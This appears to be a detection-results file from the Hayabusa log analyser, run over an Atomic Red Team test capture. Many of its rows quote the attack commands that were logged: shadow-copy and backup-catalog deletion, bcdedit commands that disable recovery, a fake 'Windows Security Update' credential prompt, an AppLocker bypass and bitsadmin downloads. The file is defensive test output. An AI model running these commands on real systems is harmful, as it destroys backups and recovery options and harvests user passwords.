+2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP""  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe  /U T1121.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP""  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe  -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe  import c:\AtomicRedTeam\atomics\T1103\T1103.reg  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe  delete shadows /all /quiet  :  Path: C:\Windows\System32\vssadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe  delete catalog -quiet  :  Path: C:\Windows\System32\wbadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe""  :  Path: C:\Windows\System32\wbengine.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe  :  Path: C:\Windows\System32\vds.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe  /set {default} bootstatuspolicy ignoreallfailures  :  Path: C:\Windows\System32\bcdedit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe  /set {default} recoveryenabled no  :  Path: C:\Windows\System32\bcdedit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe   /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /create AtomicBITS  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
